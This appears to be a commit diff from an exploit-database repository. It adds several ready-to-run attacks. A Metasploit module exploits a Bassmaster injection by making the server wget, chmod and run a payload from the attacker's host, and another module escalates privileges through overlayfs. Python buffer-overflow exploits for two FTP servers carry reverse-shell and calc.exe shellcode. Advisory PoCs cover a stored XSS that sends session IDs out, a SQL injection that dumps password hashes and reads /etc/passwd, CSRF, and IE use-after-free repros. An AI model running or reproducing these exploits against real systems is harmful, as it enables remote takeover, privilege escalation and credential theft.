if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
end
def upload_and_chmod(fname, fcontent, cleanup=true)
print_status "Writing to #{fname} (#{fcontent.size} bytes)"
rm_f fname
write_file(fname, fcontent)
cmd_exec("chmod +x #{fname}")
if cleanup
register_file_for_cleanup(fname)
end
end
def on_new_session(session)
super
if target.name == 'CVE-2015-1328'
session.shell_command("/bin/su") #this doesnt work on meterpreter?????
# we cleanup here instead of earlier since we needed the /bin/su in our new session
session.shell_command('rm -f /etc/ld.so.preload')
session.shell_command('rm -f /tmp/ofs-lib.so')
end
end
if compile
begin
if target.name == 'CVE-2015-1328'
# direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
# Also removed the on-the-fly compilation of ofs-lib.c and we do that manually ahead of time, or drop the binary.
path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', '1328.c')
fd = ::File.open( path, "rb")
cve_2015_1328 = fd.read(fd.stat.size)
fd.close
# pulled out from 1328.c's LIB define
path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', 'ofs-lib.c')
fd = ::File.open( path, "rb")
ofs_lib = fd.read(fd.stat.size)
fd.close
else
# direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-8660', '8660.c')
fd = ::File.open( path, "rb")
cve_2015_8660 = fd.read(fd.stat.size)
fd.close
end
rescue
compile = false #hdm said external folder is optional and all module should run even if external is deleted. If we fail to load, default to binaries
end
end
if compile
if target.name == 'CVE-2015-1328'
cve_2015_1328.gsub!(/execl\("\/bin\/su","su",NULL\);/,
"execl(\"#{payload_path}\",\"#{payloadname}\",NULL);")
upload_and_chmod("#{executable_path}.c", cve_2015_1328)
ofs_path = "#{datastore['WritableDir']}/ofs-lib"
upload_and_chmod("#{ofs_path}.c", ofs_lib)
cmd_exec("gcc -fPIC -shared -o #{ofs_path}.so #{ofs_path}.c -ldl -w") # compile dependency file
register_file_for_cleanup("#{ofs_path}.c")
else
cve_2015_8660.gsub!(/os.execl\('\/bin\/bash','bash'\)/,
"os.execl('#{payload_path}','#{payloadname}')")
upload_and_chmod("#{executable_path}.c", cve_2015_8660)
end
vprint_status("Compiling #{executable_path}.c")
cmd_exec("gcc -o #{executable_path} #{executable_path}.c") # compile
register_file_for_cleanup(executable_path)
else
if target.name == 'CVE-2015-1328'
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', '1328')
fd = ::File.open( path, "rb")
cve_2015_1328 = fd.read(fd.stat.size)
fd.close
upload_and_chmod(executable_path, cve_2015_1328)
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', 'ofs-lib.so')
fd = ::File.open( path, "rb")
ofs_lib = fd.read(fd.stat.size)
fd.close
ofs_path = "#{datastore['WritableDir']}/ofs-lib"
# dont auto cleanup or else it happens too quickly and we never escalate ourprivs
upload_and_chmod("#{ofs_path}.so", ofs_lib, false)
# overwrite with the hardcoded variable names in the compiled versions
payload_filename = 'lXqzVpYN'
payload_path = '/tmp/lXqzVpYN'
else
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8660', '8660')
fd = ::File.open( path, "rb")
cve_2015_8660 = fd.read(fd.stat.size)
fd.close
upload_and_chmod(executable_path, cve_2015_8660)
# overwrite with the hardcoded variable names in the compiled versions
payload_filename = '1H0qLaq2'
payload_path = '/tmp/1H0qLaq2'
end
end
upload_and_chmod(payload_path, generate_payload_exe)
vprint_status('Exploiting...')
output = cmd_exec(executable_path)
output.each_line { |line| vprint_status(line.chomp) }
end
end

168
platforms/linux/remote/40689.rb Executable file
View file

@ -0,0 +1,168 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Bassmaster Batch Arbitrary JavaScript Injection Remote Code Execution',
'Description' => %q{
This module exploits an un-authenticated code injection vulnerability in the bassmaster
nodejs plugin for hapi. The vulnerability is within the batch endpoint and allows an
attacker to dynamically execute JavaScript code on the server side using an eval.
Note that the code uses a '\x2f' character so that we hit the match on the regex.
},
'Author' =>
[
'mr_me <mr_me@offensive-security.com>', # msf
'Jarda Kotesovec' # original bug finder
],
'References' =>
[
[ 'CVE', '2014-7205'],
[ 'URL', 'https://nodesecurity.io/advisories/bassmaster_js_injection'], # nodejs advisory
],
'License' => MSF_LICENSE,
'Platform' => ['linux', 'bsd'], # binary > native JavaScript
'Arch' => [ARCH_X86, ARCH_X86_64],
'Privileged' => false,
'Targets' =>
[
[ 'Bassmaster <= 1.5.1', {} ] # Other versions are also affected
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 1 2016'))
register_options(
[
Opt::RPORT(8080), # default port for the examples/batch.js file
OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/batch"]), # default route for the examples/batch.js file
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
], self.class)
end
def check
# So if we can append an encapsulated string into the body
# we know that we can execute arbitrary JavaScript code
rando = rand_text_alpha(8+rand(8))
check = "+'#{rando}'"
# testing
requests = [
{:method => "get", :path => "/profile"},
{:method => "get", :path => "/item"},
{:method => "get", :path => "/item/$1.id#{check}"}, # need to match this /(?:\/)(?:\$(\d)+\.)?([^\/\$]*)/g;
]
post = {:requests => requests}
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(datastore['URIPATH']),
'ctype' => 'application/json',
'data' => post.to_json
})
# default example app
if res and res.code == 200 and res.body =~ /#{rando}/
return CheckCode::Vulnerable
# non-default app
elsif res and res.code == 500 and res.body =~ /#{rando}/
return CheckCode::Appears
end
return CheckCode::Safe
end
def on_request_uri(cli, request)
if (not @pl)
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
@elf_sent = true
send_response(cli, @pl)
end
def send_payload
@bd = rand_text_alpha(8+rand(8))
pn = rand_text_alpha(8+rand(8))
register_file_for_cleanup("/tmp/#{@bd}")
cmd = "wget #{@service_url} -O \\x2ftmp\\x2f#{@bd};"
cmd << "chmod 755 \\x2ftmp\\x2f#{@bd};"
cmd << "\\x2ftmp\\x2f#{@bd}"
pay = ";require('child_process').exec('#{cmd}');"
# pwning
requests = [
{:method => "get", :path => "/profile"},
{:method => "get", :path => "/item"},
{:method => "get", :path => "/item/$1.id#{pay}"}, # need to match this /(?:\/)(?:\$(\d)+\.)?([^\/\$]*)/g;
]
post = {:requests => requests}
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(datastore['URIPATH']),
'ctype' => 'application/json',
'data' => post.to_json
})
# default example app
if res and res.code == 200 and res.body =~ /id/
return true
# incase we are not targeting the default app
elsif res and res.code == 500 and es.body !=~ /id/
return true
end
return false
end
def start_http_server
@pl = generate_payload_exe
@elf_sent = false
downfile = rand_text_alpha(8+rand(8))
resource_uri = "\\x2f#{downfile}"
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
# do not use SSL for the attacking web server
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
@service_url = "http:\\x2f\\x2f#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
service_url_payload = srv_host + resource_uri
print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
datastore['SSL'] = true if ssl_restore
connect
end
def exploit
start_http_server
if send_payload
print_good("Injected payload")
# we need to delay, for the stager
select(nil, nil, nil, 5)
end
end
end

26
platforms/multiple/local/40686.txt Executable file
View file

@ -0,0 +1,26 @@
# thel3l
# Title: Citrix Receiver/Receiver Desktop Lock 4.5 Incorrect Access Control
# CVE: CVE-2016-9111
# Date of Discovery: October 27 2016
# Exploit Author: Rithwik Jayasimha
# Author Homepage/Contact: https://thel3l.me
# Vendor Name: Citrix
# Vendor Homepage: https://www.citrix.com/
# Software Link: Receiver - https://www.citrix.com/go/receiver.html
Receiver Desktop Lock - https://www.citrix.com/downloads/citrix-receiver/additional-client-software/receiver-desktop-lock-45.html
# Version: 10.6.3
# Tested on: Windows 8.1, macOS 10.12.1 Sierra
# Category: local
# Vulnerability type: Incorrect Access Control
# Description: Allows attacker with physical access to VDI to bypass authentication requirement. Citrix Receiver and/or Desktop Lock for Mac OSX and Windows suffer from a local incorrect access control.
To exploit this:
1. An attacker would first identify a VDI with a logged in user, which has been locked.
2. The attacker then proceeds to disconnect the system from the network temporarily (removing and reinserting the LAN cable is enough).
3. Citrix Receiver then proceeds to unlock the session and allows the attacker full access to the connected user's account without confirming the user's identity.
# Additional Notes, References and links:
* This exploit is not 100% reliable - it may take a couple of tries to be able to accurately reproduce this behavior.
* This attack has only been attempted with physical access - it may also be possible to remotely script a restart of a network adapter to cause the same behavior.

3
platforms/php/webapps/15721.txt
View file

@ -4,5 +4,4 @@
# Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/portfolio/14834
# Version: 1.1.2
index.php?option=com_billyportfolio&view=billyportfolio&catid=-1 and
if(1,benchmark(5000000,md5(1)),1)
index.php?option=com_billyportfolio&view=billyportfolio&catid=-1 and if(1,benchmark(5000000,md5(1)),1)

7
platforms/php/webapps/35965.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/48692/info
The 'com_resman' component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php?option=com_resman&task=list&city=<BODY%20ONLOAD=alert("SOLVER")>

50
platforms/php/webapps/40682.txt Executable file
View file

@ -0,0 +1,50 @@
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: PHP Object Injection
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8580
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2
Vulnerability Details
=====================
A PHP object injection vulnerability exists in multiple widget files
due to the unsafe use of the unserialize() function. The affected
files include flow_chart.php, gauge.php, honeypot.php,
image.php,inventory.php, otx.php, rss.php, security.php, siem.php,
taxonomy.php, tickets.php, and url.php.
An authenticated attacker could send a serialized PHP object to one of
the vulnerable pages and potentially gain code execution via magic
methods in included classes.
POC
====
This benign POC injects the IDS_Report class from PHPIDS into the
refresh parameter of image.php. The __toString method of IDS_Report is
then executed and the output is displayed in the value of the content
field in the response:
/ossim/dashboard/sections/widgets/data/image.php?type=test&wtype=blah&height=1&range=1&class=1&id=&adj=1&value=a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3Bs%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{s%3A9%3A%22%00*%00events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22%00*%00tags%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00*%00impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3Bs%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B}
Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
==========
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities

46
platforms/php/webapps/40683.txt Executable file
View file

@ -0,0 +1,46 @@
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: Stored XSS
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8581
CVSS: 3.5
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2
Vulnerability Details
=====================
A stored XSS vulnerability exists in the User-Agent header of the
login process. It's possible to inject a script into that header that
then gets executed when mousing over the User-Agent field in Settings
-> Current Sessions.
POC
===
The POC uses jQuery to send all session IDs on the "Current Sessions"
page to an arbitrary site (Google, in this case)
<script>$('#ops_table
.ops_id').each(function(){$.get("https://www.google.com/",{session:($(this).html())});});</script>
Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
==========
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities

53
platforms/php/webapps/40684.txt Executable file
View file

@ -0,0 +1,53 @@
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: SQL Injection
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8582
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2
Vulnerability Details
=====================
A SQL injection vulnerability exists in the value parameter of
/ossim/dashboard/sections/widgets/data/gauge.php on line 231. By
sending a serialized array with a SQL query in the type field, it's
possible to execute an arbitrary SQL query. The result is not
displayed on the screen, but it can be exploited as a blind SQLi or
have the output directed to a file and then retrieved via another
request. Authentication is required.
POC
===
This request will dump user password hashes to a file:
/ossim/dashboard/sections/widgets/data/gauge.php?&type=alarm&wtype=blah&asset=1&height=1&value=a%3A1%3A%7Bs%3A4%3A%22type%22%3Bs%3A67%3A%22pass+from+users+INTO+OUTFILE+%27%2Ftmp%2F10.0.0.123_pass_tshark.pcap%27--+-%22%3B%7D
The file containing the output can then be retrieved with the following request:
/ossim/pcap/download.php?scan_name=pass&sensor_ip=10.0.0.123
It's also possible to read the contents of any file readable by the
mysql user by using mysql's load_file function. For example, changing
the request to something like select load_file('/etc/passwd') .
Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
==========
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities

35
platforms/php/webapps/40692.html Executable file
View file

@ -0,0 +1,35 @@
<!--
# Exploit Title: SweetRice 1.5.1 - Cross-Site Request Forgery
# Exploit Author: Ashiyane Digital Security Team
# Date: 03-11-2016
# Vendor: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1
# Platform: WebApp - PHP - Mysql
# Exploit 1:
-->
<html>
<!-- CSRF PoC -->
<body>
<form action="http://localhost/as/?type=data&mode=sql_execute&form_mode=yes" method="POST">
<input type="hidden" name='sql_content' value="CREATE DATABASE testfcb">
<input type="submit" value="Execute" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
<!--
Exploit 2:
Next send request a file with name 'SweetRice-transfer.zip' create in main directory and you can access to all of files in this url:
http://localhost/SweetRice-transfer.zip
-->
<html>
<!-- CSRF PoC -->
<body>
<img src='http://localhost/1/as/?type=data&mode=transfer&form_type=pack'></img>
</body>
</html>

41
platforms/windows/dos/40685.html Executable file
View file

@ -0,0 +1,41 @@
<!--
Source: http://blog.skylined.nl/20161101001.html
Synopsis
A specially crafted webpage can cause Microsoft Internet Explorer 9 to reallocate a memory buffer in order to grow it in size. The original buffer will be copied to newly allocated memory and then freed. The code continues to use the freed copy of the buffer.
Known affected versions, attack vectors and mitigations
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted webpage. Disabling JavaScript should prevent an attacker from triggering the vulnerable code path.
-->
<!doctype html>
<script>
oTextArea = document.createElement('textarea');
oTextArea.dataSrc = 1;
oTextArea.id = 1;
oTextArea.innerHTML = 1;
oTextArea.onvolumechange = 1;
oTextArea.style.setProperty('list-style', "url()");
</script>
<!--
Analysis
The CAttrArray object initially allocates a CImplAry buffer of 0x40 bytes, which can store 4 attributes. When the buffer is full, it is grown to 0x60 bytes. A new buffer is allocated at a different location in memory and the contents of the original buffer is copied there. The repro causes the code to do this, but the code continues to access the original buffer after it has been freed.
Exploit
If an attacker was able to cause MSIE to allocate 0x40 bytes of memory and have some control over the contents of this memory before MSIE reuses the freed memory, there is a chance that this issue could be used to execute arbitrary code. I did not attempt to write an exploit for this vulnerability myself.
Timeline
- April 2014: This vulnerability was found through fuzzing.
- July 2014: This vulnerability was submitted to ZDI.
- July 2014: ZDI reports a collision with a report by another researcher. (From the credits given by Microsoft and ZDI, I surmise that it was Peter 'corelanc0d3r' Van Eeckhoutte of Corelan who reported this issue.
- October 2014: Microsoft release MS14-056, which addresses this issue.
- November 2016: Details of this issue are released.
-->

36
platforms/windows/dos/40691.html Executable file
View file

@ -0,0 +1,36 @@
<!--
Source: http://blog.skylined.nl/20161102001.html
Synopsis
Setting the listStyleImage property of an Element object causes Microsoft Internet Explorer 11 to allocate 0x4C bytes for an "image context" structure, which contains a reference to the document object as well as a reference to the same CMarkup object as the document. When the element is removed from the document (-fragment), this image context is freed on the next "draw". However, the code continues to use the freed context almost immediately after it is freed.
Known affected versions, attack vectors and mitigations
Microsoft Internet Explorer 11
An attacker would need to get a target user to open a specially crafted webpage. As far as can be determined, disabling JavaScript should prevent an attacker from triggering the vulnerable code path.
-->
<script>
var oDocumentFragment = document.createDocumentFragment(),
oElement = document.createElement('x');
oDocumentFragment.appendChild(oElement);
oElement.style.listStyleImage = "url(x)";
oDocumentFragment.removeChild(oElement);
</script>
<!--
Exploit
I tried a few tricks to see if there was an easy way to reallocate the freed memory before the reuse, but was unable to find anything. I do not know if there is a way to cause further reuse of the freed memory later on in the code. Running the repro as-is without page heap does not appear to trigger crashes. It does not appear that there is enough time between the free and reuse to exploit this issue.
Timeline
May 2014: This vulnerability was found through fuzzing.
June 2014: This vulnerability was submitted to ZDI.
July 2014: ZDI rejects the submission.
November 2016: The issue does not reproduce in the latest build of MSIE 11.
November 2016: Details of this issue are released.
Unfortunately, my records of what happened after ZDI rejected the issue are patchy. It appears that I did not pursue reporting the issue anywhere else, but Microsoft does appear to have patched the issue, as I can no longer reproduce it.
-->

56
platforms/windows/remote/40680.py Executable file
View file

@ -0,0 +1,56 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: PCMan's FTP Server 2.0.7 UMASK Command Buffer Overflow Exploit
# Date: 1/11/2016
# Exploit Author: Eagleblack
# Tested on: Windows XP Profesional SP3 Spanish version x86
# CVE : N/A
import socket
ret="\x10\xb3\x3d\x7e" #USER32 this dll have a jump to ESP stack pointer
#Metasploit shellcode:
#msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b '\x00\x0a\x0d' -f c
shellcode = ("\xd9\xe5\xba\x7e\xd1\x2c\x95\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
"\x52\x31\x50\x17\x83\xe8\xfc\x03\x2e\xc2\xce\x60\x32\x0c\x8c"
"\x8b\xca\xcd\xf1\x02\x2f\xfc\x31\x70\x24\xaf\x81\xf2\x68\x5c"
"\x69\x56\x98\xd7\x1f\x7f\xaf\x50\x95\x59\x9e\x61\x86\x9a\x81"
"\xe1\xd5\xce\x61\xdb\x15\x03\x60\x1c\x4b\xee\x30\xf5\x07\x5d"
"\xa4\x72\x5d\x5e\x4f\xc8\x73\xe6\xac\x99\x72\xc7\x63\x91\x2c"
"\xc7\x82\x76\x45\x4e\x9c\x9b\x60\x18\x17\x6f\x1e\x9b\xf1\xa1"
"\xdf\x30\x3c\x0e\x12\x48\x79\xa9\xcd\x3f\x73\xc9\x70\x38\x40"
"\xb3\xae\xcd\x52\x13\x24\x75\xbe\xa5\xe9\xe0\x35\xa9\x46\x66"
"\x11\xae\x59\xab\x2a\xca\xd2\x4a\xfc\x5a\xa0\x68\xd8\x07\x72"
"\x10\x79\xe2\xd5\x2d\x99\x4d\x89\x8b\xd2\x60\xde\xa1\xb9\xec"
"\x13\x88\x41\xed\x3b\x9b\x32\xdf\xe4\x37\xdc\x53\x6c\x9e\x1b"
"\x93\x47\x66\xb3\x6a\x68\x97\x9a\xa8\x3c\xc7\xb4\x19\x3d\x8c"
"\x44\xa5\xe8\x03\x14\x09\x43\xe4\xc4\xe9\x33\x8c\x0e\xe6\x6c"
"\xac\x31\x2c\x05\x47\xc8\xa7\xea\x30\xd3\x30\x83\x42\xd3\x3f"
"\xe8\xca\x35\x55\x1e\x9b\xee\xc2\x87\x86\x64\x72\x47\x1d\x01"
"\xb4\xc3\x92\xf6\x7b\x24\xde\xe4\xec\xc4\x95\x56\xba\xdb\x03"
"\xfe\x20\x49\xc8\xfe\x2f\x72\x47\xa9\x78\x44\x9e\x3f\x95\xff"
"\x08\x5d\x64\x99\x73\xe5\xb3\x5a\x7d\xe4\x36\xe6\x59\xf6\x8e"
"\xe7\xe5\xa2\x5e\xbe\xb3\x1c\x19\x68\x72\xf6\xf3\xc7\xdc\x9e"
"\x82\x2b\xdf\xd8\x8a\x61\xa9\x04\x3a\xdc\xec\x3b\xf3\x88\xf8"
"\x44\xe9\x28\x06\x9f\xa9\x59\x4d\xbd\x98\xf1\x08\x54\x99\x9f"
"\xaa\x83\xde\x99\x28\x21\x9f\x5d\x30\x40\x9a\x1a\xf6\xb9\xd6"
"\x33\x93\xbd\x45\x33\xb6")
buffer = '\x41'* 2006 + ret + '\x90'* 30 + shellcode #EIP overwritten at offset 2006
print "Sending Buffer"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #open socket
connect = s.connect(('192.168.1.13',21)) #IP address and port (21) from the target
s.recv(1024) #FTPBanner
s.send('USER anonymous\r\n') #Sending USER
s.recv(1024)
s.send('PASS \r\n') #Sending Password (Null password)
s.recv(1024)
s.send('UMASK' + buffer +'\r\n')
s.close()

55
platforms/windows/remote/40681.py Executable file
View file

@ -0,0 +1,55 @@
import socket
import sys
import os
print '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: FreefloatFTPserver1.0_dir_command_remotecode_exploit
# Date: 2016.11.02
# Exploit Author: Greg Priest
# Version: FreefloatFTPserver1.0
# Tested on: Windows7 x64 HUN/ENG Professional
'''
ip = raw_input("Target ip: ")
port = 21
overflow = 'A' * 247
eip = '\xF4\xAF\xEA\x75' + '\x90' * 10
#shellcode calc.exe
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")
remotecode = overflow + eip + shellcode + '\r\n'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((ip ,port))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASSW hacker@hacker.net\r\n')
s.recv(1024)
print '''
Successfull Exploitation!
'''
message = 'dir ' + remotecode
s.send(message)
s.recv(1024)
s.close